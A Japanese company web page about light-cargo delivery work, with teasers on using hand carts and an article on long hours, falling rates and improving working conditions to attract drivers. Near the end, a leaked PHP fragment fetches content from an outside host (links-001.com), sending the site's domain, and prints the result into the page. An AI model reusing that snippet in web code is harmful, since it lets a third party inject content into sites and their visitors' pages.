前へ
次へ

軽貨物の運送を行う際に台車を準備した方が良いか

軽貨物の運送業者として働く場合に台車を完備しているドライバーを見かけますが、台車は揃えておいた方が良

more

軽貨物の運送にて台車を使用するメリット

軽貨物の運送業者として働く際に台車を利用しているドライバーも多いようです。軽貨物の運送にて台車を使用

more

軽貨物の運送にて台車を使用する際の注意点

軽貨物の運送の際に重量のある荷物を運べることから台車は重宝する備品の1つです。しかし、軽貨物の運送に

more

軽貨物の運送業界が労働環境改善へと取り組む必要性

近年の宅配サービスの多様化などに伴い、軽貨物の求人を出しているけれど人が集まらない・すぐに離職してしまうといった課題が軽貨物の運送業者の中では大きな問題となっています。その原因として考えられるのが若年層にとって軽貨物の運送業者が魅力的な職場ではなくなってきているということです。元々軽貨物などの運送業者は荷待ちなどの問題があるため長時間労働になりやすくなっています。今の若年層にとっては長時間労働のある職場はなかなか魅力的には映りにくい面もあるため、軽貨物の求人への応募が少なくなっていると考えられます。また軽貨物などを含む物流への参入への規制緩和により、競合他社が多くなったことによる運賃の低下が発生しています。それに伴い、軽貨物の運送業者の得られる収入が減少してしまっているため多数の依頼を引き受けないと稼ぎにくくなりつつあります。しかし、近年ドライバーの長時間労働防止のため労働時間の制限が法律によって厳しくなってきています。個人の軽貨物の運送業者に対しても適正な労働管理をすべきという法認識ができつつあることを踏まえると軽貨物の運送を長時間行うことで高収入を得るといった働き方を行うことも将来的に難しくなっていくでしょう。ですから今後軽貨物の運送の求人にて人材を確保するためには高収入だけでなく快適に働ける環境にすることを重視する必要があります。例えば長時間労働をなくせるよう、荷待ち時間の削減などの問題解消を行い、長時間労働ではない環境を作っていくことが重要です。加えて職場環境の改善や働き方の認識の変化を行うことも重要です。実際にある軽貨物の運送業者では休憩所やトイレをきれいにしただけで、離職者が減ったという実績もあります。また昼間だけ働ける軽貨物の女性ドライバーを求人募集したところ人材が確保できるようになった例もあります。このように軽貨物の仕事の人材を確保するためには新たな労働者のニーズにマッチングする職場へと変化させていくことも言えそうです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top